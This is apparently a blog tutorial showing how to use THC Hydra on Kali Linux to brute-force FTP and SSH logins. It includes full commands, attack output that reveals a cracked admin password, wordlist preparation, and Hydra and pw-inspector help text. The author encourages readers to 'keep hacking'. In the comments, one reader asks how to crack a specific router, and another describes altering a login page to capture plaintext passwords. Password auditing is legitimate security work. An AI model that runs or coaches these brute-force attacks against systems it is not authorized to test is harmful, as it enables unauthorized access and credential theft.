Crack passwords in Kali Linux with Hydra

For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as a target service and will show how to crack passwords in Kali Linux with Hydra. Crack passwords in Kali Linux with Hydra - blackMORE Ops -1

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallelized connects. We’ve previously covered password cracking using John the Ripper, Wireshark,NMAP and MiTM.

Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently THC Hydra tool supports the following protocols:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Supported Platforms

  1. All UNIX platforms (linux, *bsd, solaris, etc.)
  2. Mac OS/X
  3. Windows with Cygwin (both IPv4 and IPv6)
  4. Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.

For brute forcing Hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with John the Ripper which is another password cracking tool. Other password lists are available online, simply Google it.

The password list s pre-installed on Kali Linux and its password list can be found at the following location

/usr/share/john/password.lst

It looks like this

#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
#!comment:
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first).  It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment:
#!comment: Last update: 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890

Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our word list of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.

Here is the simple command with output

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host: 192.168.1.1   login: admin   password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33
root@kali:~#

Check the line “[21][ftp]”. It mentions the username/password combination that worked for the ftp server. Quite easy!
Now lets take a look at the options. The t option tells how many parallel threads Hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this its better to do 1 attempt at a time. The next option is “l” which tells the username or login to use. In this case its admin. Next comes the capital “P” option which provides the word list to use. Hydra will pickup each line as a single password and use it.

The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/IP address followed by the service to crack.

THC hydra help menu - click to expand

THC hydra help menu - click to expand

root@kali:~# hydra -h
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

hydra Usage Example

Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123):

root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22

Brute forcing is the most basic form of password cracking techniques. In works well with devices like routers etc which are mostly configured with their default passwords. However when it comes to other systems, brute forcing will not work unless you are too lucky.

However still brute forcing is a good practice for hackers so you should keep trying all techniques to hack a system. So keep hacking!!

Additional tools bundled with THC Hydra

pw-inspector

It reads passwords in and prints those which meets the requirements

pw-inspector help menu - click to expand

pw-inspector help menu - click to expand

root@kali:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.

pw-inspector Usage Example

Read in a list of passwords (-i /usr/share/wordlists/nmap.lst) and save to a file (-o /root/passes.txt), selecting passwords of a minimum length of 6 (-m 6) and a maximum length of 10 (-M 10):

root@kali:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10
root@kali:~# wc -l /usr/share/wordlists/nmap.lst
5086 /usr/share/wordlists/nmap.lst
root@kali:~# wc -l /root/passes.txt
4490 /root/passes.txt

			

Resources

Source: http://www.thc.org/thc-hydra/

  • Author: Van Hauser, Roland Kessler

11 comments

  1. but you need wordlist :/

    • That is why the author mentioned people still making mistake of not making their password secure enough, basically this to get low hanging fruits for further recon

  2. i want to hack a tenda 11n router by hydra its not have admin or username its only have password

  3. inifconfig i cant find inet addr ? need help

  4. when I type the command /usr/share/john/password.lst it is showing the permission denied
    is there any solution

  5. uh come back when you can bruteforce paswords such as aiVu/tiedae7aix9oeg%aeveipoo*nohquocheizee9Phae#mei:V3dooj=u*ibo in real time (or close to) on affordable hardware

    • bruh bruteforcing a password takes at least 14 hours for an average 7 letter password… you will have more success calling and asking them for their password

  6. i know which this doesn’t seem very impressive to me

    wordlists/rainbowtables can get huge fast, rainbowtables have problems of their own, foreign languages can make wordlists useless

    and, like you said, bruteforcing takes a long time (we brute forced a few md5 hashes for our classes php board back in 2003 and the longest one we got was 7 chars long and took days on a dualcpu p3 450mhz), then i thought about it and just modified the login page to store the unencrypted password…. everyone wondered how we could do any password at once :)

  7. i have getting this like cracking with hydra

  8. We interviewed the developer of THC Hydra – thought you’d be interested to read their comments:

    https://www.concise-courses.com/interview-thc-hydra/

Leave a Reply. (Anonymous comments allowed). Use WP, Twitter, FaceBook or Google+ for faster responses.